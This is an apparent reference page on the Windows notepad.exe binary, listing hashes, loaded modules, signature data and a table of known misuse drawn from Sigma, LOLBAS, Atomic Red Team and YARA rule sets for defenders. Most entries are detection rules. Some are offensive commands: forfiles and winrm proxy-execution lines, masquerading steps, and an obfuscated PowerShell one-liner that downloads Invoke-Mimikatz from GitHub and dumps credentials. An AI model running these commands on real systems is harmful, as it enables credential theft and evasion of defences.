notepad.exe

  • File Path: C:\Windows\SysWOW64\notepad.exe
  • Description: Notepad

Screenshot

notepad.exe

Hashes

Type Hash
MD5 E92D3A824A0578A50D2DD81B5060145F
SHA1 50EF7C645FD5CBB95D50FBADDF6213800F9296EC
SHA256 87F53BC444C05230CE439DBB127C03F2E374067D6FB08E91C834371FD9ECF661
SHA384 94B1A77101BDDDEC053CF61624F984A858F9A284CE2067EC8497A29A23A056D25D16C4C4D658FEAD8FDE04F4D350F091
SHA512 40D0AC6FA5A424B099923FCDB465E9A2F44569AF1C75CF05323315A8720517316A7E8627BE248CFF3A83382FB6DB1CF026161F627A39BC1908E63F67A34C0FD5
SSDEEP 3072:GLLvkpY5SnMwbv5RkorwMLuflibzL/cNArhCAEf7ngKpIcXNokJrzOxEPcZA8TJa:E6USNVRkIHXO7RN/1y6PcOwej/Hv
IMP 291BF41874EDCDB21D447B43EE0E6B1F
PESHA1 A449A35286CAC895B59970FC543E0E255D62A779
PE256 A3D73A766B718A3D19322043E6418EB9657F752543BDAFA9FD8BCBFA3E874625

Runtime Data

Window Title:

–help - Notepad

Open Handles:

Path Type
(R-D) C:\Windows\Fonts\StaticCache.dat File
(R-D) C:\Windows\System32\en-US\notepad.exe.mui File
(R-D) C:\Windows\SystemResources\notepad.exe.mun File
(RW-) C:\Users\user File
(RW-) C:\Windows File
(RW-) C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.488_none_11b1e5df2ffd8627 File
\BaseNamedObjects__ComCatalogCache__ Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000002.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2 Section
\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 Section
\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 Section
\Sessions\1\BaseNamedObjects\windows_shell_global_counters Section
\Sessions\1\Windows\Theme1175649999 Section
\Windows\Theme601709542 Section

Loaded Modules:

Path
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\wow64.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\SysWOW64\notepad.exe

Signature

  • Status: Signature verified.
  • Serial: 330000023241FB59996DCC4DFF000000000232
  • Thumbprint: FF82BC38E1DA5E596DF374C53E3617F7EDA36B06
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: NOTEPAD.EXE
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.19041.1 (WinBuild.160101.0800)
  • Product Version: 10.0.19041.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/76
  • VirusTotal Link: https://www.virustotal.com/gui/file/87f53bc444c05230ce439dbb127c03f2e374067d6fb08e91c834371fd9ecf661/detection

Possible Misuse

The following table contains possible examples of notepad.exe being misused. While notepad.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma image_load_susp_image_load.yml - '\notepad.exe' DRL 1.0
sigma net_connection_win_notepad_network_connection.yml title: Notepad Making Network Connection DRL 1.0
sigma net_connection_win_notepad_network_connection.yml description: Detects suspicious network connection by Notepad DRL 1.0
sigma net_connection_win_notepad_network_connection.yml - https://blog.cobaltstrike.com/2013/08/08/why-is-notepad-exe-connecting-to-the-internet/ DRL 1.0
sigma net_connection_win_notepad_network_connection.yml Image\|endswith: '\notepad.exe' DRL 1.0
sigma proc_creation_win_susp_gup.yml description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks DRL 1.0
sigma proc_creation_win_susp_gup.yml - '\Users\\*\AppData\Local\Notepad++\updater\GUP.exe' DRL 1.0
sigma proc_creation_win_susp_gup.yml - '\Users\\*\AppData\Roaming\Notepad++\updater\GUP.exe' DRL 1.0
sigma proc_creation_win_susp_gup.yml - '\Program Files\Notepad++\updater\GUP.exe' DRL 1.0
sigma proc_creation_win_susp_gup.yml - '\Program Files (x86)\Notepad++\updater\GUP.exe' DRL 1.0
sigma proc_creation_win_susp_gup.yml - Execution of tools named GUP.exe and located in folders different than Notepad++\updater DRL 1.0
LOLBAS Gpup.yml Description: Execute another command through gpup.exe (Notepad++ binary).  
LOLBAS Gpup.yml - 'C:\Program Files (x86)\Notepad++\updater\gpup.exe '  
LOLBAS Explorer.yml - Command: explorer.exe C:\Windows\System32\notepad.exe  
LOLBAS Forfiles.yml - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe  
LOLBAS Forfiles.yml Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.  
LOLBAS Forfiles.yml - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"  
LOLBAS Forfiles.yml Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.  
LOLBAS pester.yml - Command: Pester.bat [/help\|?\|-?\|/?] "$null; notepad"  
LOLBAS pester.yml Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. Example here executes notepad  
LOLBAS Winrm.yml - Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985'  
LOLBAS Winrm.yml - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985'  
LOLBAS Cdb.yml - Command: cdb.exe -cf x64_calc.wds -o notepad.exe  
LOLBAS Dxcap.yml - Command: Dxcap.exe -c C:\Windows\System32\notepad.exe  
LOLBAS Dxcap.yml Description: Launch notepad as a subprocess of Dxcap.exe  
atomic-red-team index.md - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md - Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md ## Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe. MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md Upon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path. MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md cmd.exe /c %APPDATA%\notepad.exe /B MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md del /Q /F %APPDATA%\notepad.exe >nul 2>&1 MIT License. © 2018 Red Canary
atomic-red-team T1047.md When the test completes , a new process will be started locally .A notepad application will be started when input is left on default. MIT License. © 2018 Red Canary
atomic-red-team T1047.md | process_to_execute | Name or path of process to execute. | String | notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1047.md The EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe MIT License. © 2018 Red Canary
atomic-red-team T1047.md You should expect to see notepad.exe running after execution of this test. MIT License. © 2018 Red Canary
atomic-red-team T1048.003.md Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout. MIT License. © 2018 Red Canary
atomic-red-team T1048.003.md | input_file | Path to file to be exfiltrated. | Path | C:\Windows\System32\notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1048.003.md Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout. MIT License. © 2018 Red Canary
atomic-red-team T1048.003.md | input_file | Path to file to exfiltrate | Path | C:\Windows\System32\notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1053.005.md This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute “notepad.exe” within MIT License. © 2018 Red Canary
atomic-red-team T1053.005.md Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. MIT License. © 2018 Red Canary
atomic-red-team T1055.001.md With default arguments, expect to see a MessageBox, with notepad’s icon in taskbar. MIT License. © 2018 Red Canary
atomic-red-team T1055.001.md | process_id | PID of input_arguments | Integer | (Start-Process notepad -PassThru).id| MIT License. © 2018 Red Canary
atomic-red-team T1055.012.md | sponsor_binary_path | Path of the sponsor binary (executable that will host the binary) | String | C:\Windows\System32\notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1055.012.md | spawnto_process_name | Name of the process to spawn | String | notepad| MIT License. © 2018 Red Canary
atomic-red-team T1055.012.md This module executes notepad.exe from within the WINWORD.EXE process MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed. MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md $url=’https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1’;$wshell=New-Object -ComObject WScript.Shell;$reg=’HKCU:\Software\Microsoft\Notepad’;$app=’Notepad’;$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName(‘System.Windows.Forms’);@(@(‘iWindowPosY’,(String).Split(‘}’)[0].Split(‘=’)[5]),@(‘StatusBar’,0))|ForEach{SP $reg (Item Variable:).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:).Value.id-ieq$curpid}|ForEach{(Variable ).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys(‘^o’);Start-Sleep -Milliseconds 500;@($url,(‘ ‘*1000),’~’)|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@(‘^a’,’^c’)|ForEach{$wshell.SendKeys((Item Variable:).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@(‘%f’,’x’)|ForEach{$wshell.SendKeys((Variable ).Value)};If(GPS|?{(Item Variable:).Value.id-ieq$curpid}){@(‘{TAB}’,’~’)|ForEach{$wshell.SendKeys((Item Variable:).Value)} };@(‘iWindowPosDY’,’iWindowPosDX’,’iWindowPosY’,’iWindowPosX’,’StatusBar’)|ForEach{SP $reg (Item Variable:).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr MIT License. © 2018 Red Canary
atomic-red-team T1105.md Upon successful execution the test will open calculator and Notepad executable for 10 seconds. MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md Spawns a notepad.exe process as a child of the current process. MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md Creates a notepad.exe process and then spawns a powershell.exe process as a child of it. MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md | parent_name | Parent process to spoof from | Path | $Env:windir\System32\notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1197.md This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of “svchost.exe” and an Initiating Process Command Line of “svchost.exe -k netsvcs -p -s BITS” MIT License. © 2018 Red Canary
atomic-red-team T1197.md | command_path | Path of command to execute | Path | C:\Windows\system32\notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1202.md “This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe” MIT License. © 2018 Red Canary
atomic-red-team T1202.md forfiles /p c:\windows\system32 /m notepad.exe /c #{process} MIT License. © 2018 Red Canary
atomic-red-team T1202.md | process | Process to execute | String | notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1218.004.md Copy-Item -Path “$([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())InstallUtil.exe” -Destination “$Env:windir\System32\Tasks\notepad.exe” MIT License. © 2018 Red Canary
atomic-red-team T1218.004.md InstallUtilPath = “$Env:windir\System32\Tasks\notepad.exe” MIT License. © 2018 Red Canary
atomic-red-team T1218.004.md Remove-Item -Path “$Env:windir\System32\Tasks\notepad.exe” -ErrorAction Ignore MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed. MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed. MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md | exe_to_launch | Path of the executable to launch | Path | %windir%\System32\notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1546.001.md Change Default File Association From cmd.exe of hta to notepad. MIT License. © 2018 Red Canary
atomic-red-team T1546.001.md Upon successful execution, cmd.exe will change the file association of .hta to notepad.exe. MIT License. © 2018 Red Canary
atomic-red-team T1546.001.md | target_extension_handler | txtfile maps to notepad.exe | Path | txtfile| MIT License. © 2018 Red Canary
atomic-red-team T1546.003.md After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. MIT License. © 2018 Red Canary
atomic-red-team T1546.003.md CommandLineTemplate=”$($Env:SystemRoot)\System32\notepad.exe”;} MIT License. © 2018 Red Canary
atomic-red-team T1546.010.md AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don’t keep getting message boxes showing up. MIT License. © 2018 Red Canary
atomic-red-team T1546.012.md <blockquote>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010) MIT License. © 2018 Red Canary
atomic-red-team T1546.012.md | target_binary | Binary To Attach To | Path | C:\Windows\System32\notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1547.002.md After a reboot, Notepad.exe will be executed as child process of lsass.exe. MIT License. © 2018 Red Canary
atomic-red-team T1548.002.md Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe MIT License. © 2018 Red Canary
atomic-red-team T1548.002.md | command.to.execute | Command to execute | String | cmd.exe /c notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1564.004.md folder to view that the alternate data stream exists. To view the data in the alternate data stream, run “notepad T1564.004_has_ads.txt:adstest.txt” MIT License. © 2018 Red Canary
atomic-red-team T1564.004.md in the %temp% direcotry to view all files with hidden data streams. To view the data in the alternate data stream, run “notepad.exe T1564.004_has_ads_powershell.txt:adstest.txt” in the %temp% folder. MIT License. © 2018 Red Canary
atomic-red-team T1574.002.md - Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary MIT License. © 2018 Red Canary
atomic-red-team T1574.002.md ## Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary MIT License. © 2018 Red Canary
atomic-red-team T1574.002.md GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded. MIT License. © 2018 Red Canary
atomic-red-team T1574.002.md | gup_executable | GUP is an open source signed binary used by Notepad++ for software updates | Path | PathToAtomicsFolder\T1574.002\bin\GUP.exe| MIT License. © 2018 Red Canary
atomic-red-team T1574.012.md Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing notepad.exe with high integrity. MIT License. © 2018 Red Canary
atomic-red-team T1574.012.md the notepad process will not execute with high integrity. MIT License. © 2018 Red Canary
atomic-red-team T1574.012.md level of Event Viewer bypassing UAC and executing notepad.exe with high integrity. If the account used is not a local administrator the profiler DLL will MIT License. © 2018 Red Canary
atomic-red-team T1574.012.md still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. MIT License. © 2018 Red Canary
signature-base apt_bluetermite_emdivi.yar $s4 = “\NOTEPAD.EXE” fullword ascii CC BY-NC 4.0
signature-base apt_molerats_jul17.yar $s2 = “Notepad++.exe” fullword wide CC BY-NC 4.0
signature-base apt_olympic_destroyer.yar $s3 = “\system32\notepad.exe” fullword wide CC BY-NC 4.0
signature-base apt_poisonivy.yar $s0 = “\notepad.exe” fullword ascii /* score: ‘11.025’ */ CC BY-NC 4.0
signature-base apt_ta17_293A.yar $au2 = “/notepad.png” CC BY-NC 4.0
signature-base apt_wildneutron.yar $n1 = “/c for /L %%i in (1,1,2) DO ping 127.0.0.1 -n 3 & type %%windir%%\notepad.exe > %s & del /f %s” fullword ascii /* PEStudio Blacklist: strings / / score: ‘46.00’ */ CC BY-NC 4.0
signature-base apt_woolengoldfish.yar $s4 = “oShellLink.IconLocation = "notepad.exe, 0"” fullword CC BY-NC 4.0
signature-base crime_ransom_ragna_locker.yar $s2 = “\notepad.exe” fullword wide /* Show ransom note to the victim*/ CC BY-NC 4.0
signature-base gen_cn_hacktools.yar $s14 = “NOTEPAD.EXE result.txt” fullword ascii CC BY-NC 4.0
signature-base gen_powershell_empire.yar $s2 = “$proc = Start-Process -WindowStyle Hidden notepad.exe -PassThru” fullword ascii CC BY-NC 4.0
signature-base thor_inverse_matches.yar description = “Abnormal notepad.exe - typical strings not found in file” CC BY-NC 4.0
signature-base thor_inverse_matches.yar $winxp = “Software\Microsoft\Notepad” wide CC BY-NC 4.0
signature-base thor_inverse_matches.yar $winxp_de = “Software\Microsoft\Notepad” wide CC BY-NC 4.0
signature-base thor_inverse_matches.yar filename == “notepad.exe” CC BY-NC 4.0
stockpile 3796a00b-b11d-4731-b4ca-275a07d83299.yml Start-Process Notepad.exe -NoNewWindow -PassThru -Credential $credential; Apache-2.0

MIT License. Copyright (c) 2020-2021 Strontic.